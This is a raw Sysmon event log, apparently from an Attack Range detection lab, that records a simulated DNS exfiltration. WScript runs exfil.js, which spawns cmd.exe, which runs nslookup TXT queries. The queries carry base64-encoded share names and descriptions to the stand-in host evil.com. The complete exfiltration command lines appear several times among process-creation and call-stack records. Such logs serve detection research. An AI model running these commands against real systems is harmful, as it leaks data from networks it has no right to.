14:16:42.813{2E1864BB-17CA-629A-B741-000000005F02}7320C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CA-629A-B541-000000005F02}8104C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlazqdd.tmp 2>&1 10341000x8000000000000000203569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.775{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B641-000000005F02}2060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.775{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B641-000000005F02}2060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.775{2E1864BB-17CA-629A-B641-000000005F02}20606584C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-B541-000000005F02}8104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.759{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B641-000000005F02}2060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.759{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B541-000000005F02}8104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.759{2E1864BB-17A1-629A-783D-000000005F02}55521848C:\Windows\System32\WScript.exe{2E1864BB-17CA-629A-B541-000000005F02}8104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.761{2E1864BB-17CA-629A-B541-000000005F02}8104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlazqdd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.738{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlonyk.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.722{2E1864BB-17CA-629A-B341-000000005F02}80962252C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-B441-000000005F02}7460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.707{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.707{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.707{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.707{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.707{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B441-000000005F02}7460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.707{2E1864BB-17CA-629A-B241-000000005F02}60764620C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-B441-000000005F02}7460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.718{2E1864BB-17CA-629A-B441-000000005F02}7460C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CA-629A-B241-000000005F02}6076C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlonyk.tmp 2>&1 10341000x8000000000000000203549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.691{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B341-000000005F02}8096C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.691{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B341-000000005F02}8096C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.675{2E1864BB-17CA-629A-B341-000000005F02}80962252C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-B241-000000005F02}6076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.660{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B341-000000005F02}8096C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.660{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.660{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.660{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.660{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.660{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B241-000000005F02}6076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.659{2E1864BB-17A1-629A-783D-000000005F02}55522900C:\Windows\System32\WScript.exe{2E1864BB-17CA-629A-B241-000000005F02}6076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.658{2E1864BB-17CA-629A-B241-000000005F02}6076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlonyk.tmp 